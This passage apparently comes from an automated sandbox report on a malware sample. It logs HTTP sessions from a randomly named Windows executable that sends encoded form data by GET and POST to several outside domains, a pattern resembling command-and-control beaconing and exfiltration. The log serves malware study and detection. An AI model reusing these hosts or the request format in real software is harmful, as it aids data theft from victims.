oxIxzhP=0lnW1dqIOUd0+UD6xobbjsqE2owKKHYH/fGqiE9KaoOyV53Q39ej4BRe3zHo2ggOHq0DOZqtV3pn195hBnSYKoEMP94DaAZq6WhsbRwxwJwH8SYnowcMfLQaH2R3VrjA48iWg+b+goO99owvuUwyn6rfEPWqGKT0crLq01XXjcthy4dMeYbL03B4w793apHs4olt+fuyuQ/tIwyVPRtImAxD9zuPCESZrHlmaYgwO5l6Cnx0ovi09OETzmgl+CYb0PvRymy24KVplw299wuOyi9+nNDP4oMv9aC6UbJpMxllW5dqqoavNKCBm1YHYCliAsn+PJAZVINR4QrWYNOTAjavYSPggarnqMuijoneZ7TdwRFzRGru0EaT8iCUEBOWBcf6OPkFYeUEIzSUbWK54IcPuXj1/CGHbIk/6OMWmDv9ZtsqKt7pHrx0f9cNNUoB4WCkD9dxFWL/IytciVtTBq+XKoCfjWFMTSQ9eC/6tK7bh6np5Q5GDygtyvguxIW66j/VBg+nnq71QI4BV7JuhuB7o7iXkCskdaJev3HBgCjTQSlnWSDASQbLrcFdVbsuu7CTUVG7jGgRbFvNpQjVe9W6g4S2BwDeOpVqrXJbJPG3dcZU067VGw9vIkt/MNAjcndN+vdynL3aARS/WmKJhv1ife9qWZ64KkG2GberaJf+zznisdSDuDuSiwUTxB7VdAwgw6cKCYPwi+VxG2B2Acr9iqGMHAg5JdNUW4G9tTJeAfMf8QWBTPGaIW0Kvvu/gOM/xmb+4h1/vf03wDAE1eucYUgoYhOUKlNtHbp7ZLjGQ0zjqW/UgLUh5LVvurFw14zS5q/lwBGn4R5nxgFhFNVYmVQJ9PVLhuGS+uWY71PJj7hUm3qWM8GckftfBRH2FtRZrS8I1xiB5hZSSEkqOsUdO5vSwLnR7aLaTPIZCwNP5qTOH3/zyt0PthiesrVCeCTk4+0HLdiUyf1giHYz7GKoYUp8njo0RsUlNmaqQDaA [TRUNCATED]
Jan 11, 2025 08:00:18.014877081 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 07:00:17 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M8S1SGNAIHWoQmuM0BGNvaDGzILfTrbH0TceUhTHWNuiFzJGxm0qUaD%2F4RPWBdtbgxHzym%2BP0RqSGWouNIW6RDeYY80cd%2Bha7jDZs8Y0YysiWTVhWfwzSWOaNLZZabfJoj5LMhp0fN2G"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9003076b2b39728f-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1793&rtt_var=896&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1764&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9\|F3"S+i@O]OH,2hwe
Jan 11, 2025 08:00:18.014899969 CET	424	IN	Data Raw: 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb e8 4b 98 b8 2f de 08 31 ec cf 29 a4 06 3b 2e 20 cd 8f ca c1 05 62 72 b6 90 4d 70 66 cb 58 02 bb a1 80 9b 78 ca 04 5d 89 97 31 36 38 8d 4a 67 e7 13 1f 38 81 48 4a 1a e8 27 16 d9 6a Data Ascii: WBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>ylo:J8OP

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	50000	104.21.88.139	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:19.929486036 CET	455	OUT	GET /ryxy/?oxIxzhP=5nP22pW/HG819Fng1Mz7yNOWgr5NC2Ij4byTmEdiR9nhSI/SzfeElgFcrUzbpmknLrIGF7midHkQ4cZuPV+EJfEwK8gAHnNBpCw6WHIh95k49XlXigw3fJVZK11ld5a0iw==&qHO8p=hd0DQ8 HTTP/1.1 Host: www.incgruporxat.click Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Jan 11, 2025 08:00:20.530345917 CET	1236	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 07:00:20 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fxmlABdynXjqxSTc8WVtoEPKymM%2FVauGvDaKuwnl99RvVCfevwqCt5FSSkWxD05f7MU2YMJo7kmM6eFNYvkj%2FzyB3xJlduw5Ff96B0zDO25MtVMbPtq%2FrJVGDteliM3LcWUG4aEa%2BCGT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9003077af9877ca2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1786&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=455&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 [TRUNCATED] Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Hel
Jan 11, 2025 08:00:20.530389071 CET	924	IN	Data Raw: 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f Data Ascii: vetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	50001	185.106.208.3	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:25.760920048 CET	706	OUT	POST /oeev/ HTTP/1.1 Host: www.holytur.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.holytur.net Referer: http://www.holytur.net/oeev/ Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 31 44 4c 64 38 61 71 70 6c 71 33 6f 66 73 71 64 47 79 56 43 6d 30 62 6e 6e 61 75 56 61 61 55 65 45 39 38 48 54 52 66 62 53 49 6e 6c 72 47 6c 6d 70 6a 48 46 35 63 6f 4e 46 4b 46 4b 45 74 75 36 72 50 33 2b 53 35 79 76 58 41 4a 68 4e 5a 32 31 73 2b 47 6d 6e 67 57 5a 44 4a 51 59 47 66 48 55 52 43 77 37 6b 67 57 73 70 4e 44 59 63 4d 72 64 47 6b 4b 70 57 2f 49 76 52 62 4f 65 47 33 6b 59 57 57 4d 41 71 44 59 35 5a 49 51 64 37 7a 43 72 4e 70 30 76 44 32 31 44 36 45 44 6a 4b 78 31 73 2f 52 74 2f 68 42 4a 44 69 5a 6f 59 31 43 2b 36 37 73 67 6c 78 54 55 53 5a 4e 4b 66 71 42 54 61 75 37 51 35 69 75 51 3d Data Ascii: oxIxzhP=1DLd8aqplq3ofsqdGyVCm0bnnauVaaUeE98HTRfbSInlrGlmpjHF5coNFKFKEtu6rP3+S5yvXAJhNZ21s+GmngWZDJQYGfHURCw7kgWspNDYcMrdGkKpW/IvRbOeG3kYWWMAqDY5ZIQd7zCrNp0vD21D6EDjKx1s/Rt/hBJDiZoY1C+67sglxTUSZNKfqBTau7Q5iuQ=
Jan 11, 2025 08:00:26.469084978 CET	367	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 07:00:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy\|zzyJ)[ J7F+[Sps#~x'$0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	50002	185.106.208.3	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:28.310503006 CET	726	OUT	POST /oeev/ HTTP/1.1 Host: www.holytur.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.holytur.net Referer: http://www.holytur.net/oeev/ Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 31 44 4c 64 38 61 71 70 6c 71 33 6f 5a 4f 2b 64 42 54 56 43 79 6b 62 34 69 61 75 56 44 4b 55 61 45 39 41 48 54 51 71 44 53 2b 33 6c 72 69 68 6d 6f 69 48 46 30 38 6f 4e 57 4b 46 50 61 64 75 78 72 50 37 41 53 38 53 76 58 41 4e 68 4e 59 47 31 73 4a 61 6c 6d 77 57 66 4f 70 51 4e 4c 2f 48 55 52 43 77 37 6b 67 43 4b 70 4e 37 59 64 38 37 64 47 47 6a 62 63 66 49 73 63 4c 4f 65 51 33 6b 55 57 57 4d 79 71 43 46 63 5a 4b 6f 64 37 79 53 72 4e 38 55 73 4b 32 31 46 30 6b 43 43 48 78 34 77 37 57 4e 6a 37 67 42 4c 2b 4a 6f 61 35 55 50 51 68 4f 6f 4e 69 7a 34 71 4a 65 43 6f 37 78 79 7a 30 59 41 4a 38 35 48 6a 39 41 58 70 43 38 6b 34 36 6b 4c 64 35 5a 6a 6f 71 56 48 56 Data Ascii: oxIxzhP=1DLd8aqplq3oZO+dBTVCykb4iauVDKUaE9AHTQqDS+3lrihmoiHF08oNWKFPaduxrP7AS8SvXANhNYG1sJalmwWfOpQNL/HURCw7kgCKpN7Yd87dGGjbcfIscLOeQ3kUWWMyqCFcZKod7ySrN8UsK21F0kCCHx4w7WNj7gBL+Joa5UPQhOoNiz4qJeCo7xyz0YAJ85Hj9AXpC8k46kLd5ZjoqVHV
Jan 11, 2025 08:00:29.047530890 CET	367	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 07:00:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy\|zzyJ)[ J7F+[Sps#~x'$0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	50003	185.106.208.3	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:30.857562065 CET	1743	OUT	POST /oeev/ HTTP/1.1 Host: www.holytur.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.holytur.net Referer: http://www.holytur.net/oeev/ Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 31 44 4c 64 38 61 71 70 6c 71 33 6f 5a 4f 2b 64 42 54 56 43 79 6b 62 34 69 61 75 56 44 4b 55 61 45 39 41 48 54 51 71 44 53 2b 2f 6c 72 52 70 6d 70 46 37 46 31 38 6f 4e 56 4b 46 4f 61 64 75 73 72 4c 58 45 53 38 58 61 58 43 46 68 4e 37 4f 31 71 39 75 6c 73 77 57 66 53 5a 51 5a 47 66 47 4f 52 43 68 54 6b 67 53 4b 70 4e 37 59 64 2f 54 64 53 45 4c 62 61 66 49 76 52 62 4f 53 47 33 6b 77 57 57 55 49 71 43 52 6d 5a 37 49 64 37 54 69 72 4b 50 38 73 49 57 31 48 33 6b 43 67 48 78 30 5a 37 58 6c 76 37 67 30 51 2b 4c 6f 61 36 69 2b 64 38 74 78 57 2f 77 63 70 46 4f 75 2f 76 48 4f 64 36 35 42 34 39 72 2f 34 38 45 37 68 45 63 41 47 2b 55 4b 4b 6f 75 62 68 6d 54 36 63 38 62 33 38 77 4f 41 4d 4d 4d 76 4e 6a 31 64 6e 38 63 5a 45 5a 47 37 71 6c 54 52 31 4b 57 77 58 6d 68 68 36 4d 74 44 41 34 58 55 55 44 39 6d 46 6d 54 35 62 6b 4c 4f 2b 33 4f 54 58 4b 46 37 70 38 68 67 63 63 63 63 56 70 65 4a 31 68 79 39 77 6f 59 34 6f 34 7a 4f 67 47 39 41 37 2b 30 54 69 54 32 6e 56 35 61 74 4b 4d 41 4d 4e 63 72 [TRUNCATED] Data Ascii: oxIxzhP=1DLd8aqplq3oZO+dBTVCykb4iauVDKUaE9AHTQqDS+/lrRpmpF7F18oNVKFOadusrLXES8XaXCFhN7O1q9ulswWfSZQZGfGORChTkgSKpN7Yd/TdSELbafIvRbOSG3kwWWUIqCRmZ7Id7TirKP8sIW1H3kCgHx0Z7Xlv7g0Q+Loa6i+d8txW/wcpFOu/vHOd65B49r/48E7hEcAG+UKKoubhmT6c8b38wOAMMMvNj1dn8cZEZG7qlTR1KWwXmhh6MtDA4XUUD9mFmT5bkLO+3OTXKF7p8hgccccVpeJ1hy9woY4o4zOgG9A7+0TiT2nV5atKMAMNcrGZ4VIppMSdbKKdOP1Xe5JzMYsIZrNBfKSxLVWsk/AYx0hqGDAaWVuzot7HswUgmKZ1ZsA/zImNHi+q/WChORBLUB64nwUxcaIoiKdxSatp8uVM9A9ChroBEmzWLg4+fiNCjzAtEHEdH7MfwZFY+d7cnEkQhRzQbclBBgxtPTLyKOzX5TcEnJB1DNc9mU5PMWAeUSvWloirU6N853meDjg4wdDfgORn98O2+ofaDf1Y+gtQ6PAfiPHC6H4iX0vPi+2IPFASUz3RvzgCDuci5QH9/WHSEqzoDHl1D4DEuAAtONaZo8kbvPu5GAUW5NZQwkeN+478iSseJj+L42fK2x496sG8Llp7wvLr16WN6ONcLzhZXsSeXBPEZmLm3ISYS7mIvmV30HO+h+mSAUn6wFe/FEnUGfnvshEZYwxj+MT9vGzltx63mpqLnH3DhWD3DCOoMnOWuBamU3xDHyNaEC9EQlo1nWIqMm8YBa7rrCxoVK4yTMEloyDblCCaNeyAMso0xLvo9cnytVHy97CcT/Odbe2RlP1g/PFuU+EdenmAAfY4smBD8D9Ds5tHOYhX/7ITIuH4cdmC95jfzbrQpepJ1KtNAwI64b7YmTf6nGElaI13qk30GVfC3mGCh20x911CgMSs7EoaaZo19kDUsHVXk252itbFNuo4 [TRUNCATED]
Jan 11, 2025 08:00:31.573682070 CET	367	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 07:00:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy\|zzyJ)[ J7F+[Sps#~x'$0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50004	185.106.208.3	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:33.399070024 CET	448	OUT	GET /oeev/?qHO8p=hd0DQ8&oxIxzhP=4Bj9/uaylYDlcNOhP3Vjy2LihZ6nT7QmD+N2KgHLZ82DvRBjhSjv88Mhc+F1FP6p7OjlEaHQXhlUBbSPr8yFohqWBpxtD+TNClFTqWC2kNfadr7DAmi0av5IfLKJZURhNQ== HTTP/1.1 Host: www.holytur.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Jan 11, 2025 08:00:34.140345097 CET	706	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 07:00:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50005	13.248.169.48	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:39.184808969 CET	703	OUT	POST /qp0h/ HTTP/1.1 Host: www.lirio.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.lirio.shop Referer: http://www.lirio.shop/qp0h/ Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 43 57 69 32 4c 78 64 49 48 79 44 6b 67 69 6c 78 2f 6c 52 5a 62 31 65 78 41 70 4d 75 58 76 78 61 61 39 68 77 30 45 79 66 77 31 48 2f 36 2f 6b 37 39 43 6f 56 62 44 57 54 35 4d 54 6b 6e 67 59 52 79 65 77 39 48 32 77 77 65 49 4e 64 72 58 59 68 4a 6f 79 79 48 64 72 72 56 2b 73 6d 56 31 39 67 6c 66 39 58 47 46 66 2b 44 69 59 47 54 69 39 4b 6a 33 35 4b 61 44 6c 44 2f 30 64 6f 71 58 68 67 62 7a 46 6c 44 63 59 4d 33 47 59 75 67 46 71 37 79 38 75 77 38 38 63 79 50 30 4f 76 49 48 68 74 54 78 48 64 68 48 33 54 48 62 36 65 2b 7a 2f 6a 4d 4f 69 33 5a 58 6e 55 4e 35 75 35 55 61 75 37 44 31 68 50 46 5a 51 3d Data Ascii: oxIxzhP=CWi2LxdIHyDkgilx/lRZb1exApMuXvxaa9hw0Eyfw1H/6/k79CoVbDWT5MTkngYRyew9H2wweINdrXYhJoyyHdrrV+smV19glf9XGFf+DiYGTi9Kj35KaDlD/0doqXhgbzFlDcYM3GYugFq7y8uw88cyP0OvIHhtTxHdhH3THb6e+z/jMOi3ZXnUN5u5Uau7D1hPFZQ=
Jan 11, 2025 08:00:39.646627903 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50006	13.248.169.48	80	2704	C:\Program Files (x86)\UNHdSsuJgFYYpuwwnNuHXFPOfFcMWDCWgsdOOiKZUtuYQTTEb\HSGhOUKfqFw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 08:00:41.737482071 CET	723	OUT	POST /qp0h/ HTTP/1.1 Host: www.lirio.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.lirio.shop Referer: http://www.lirio.shop/qp0h/ Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5 Data Raw: 6f 78 49 78 7a 68 50 3d 43 57 69 32 4c 78 64 49 48 79 44 6b 69 43 31 78 39 47 35 5a 63 56 65 2b 4b 4a 4d 75 65 50 78 65 61 39 64 77 30 47 66 59 77 47 76 2f 2f 74 73 37 38 41 41 56 61 44 57 54 67 38 54 38 71 41 59 67 79 65 73 66 48 79 34 77 65 49 5a 64 72 56 51 68 4a 35 79 39 48 4e 72 70 64 65 73 6b 66 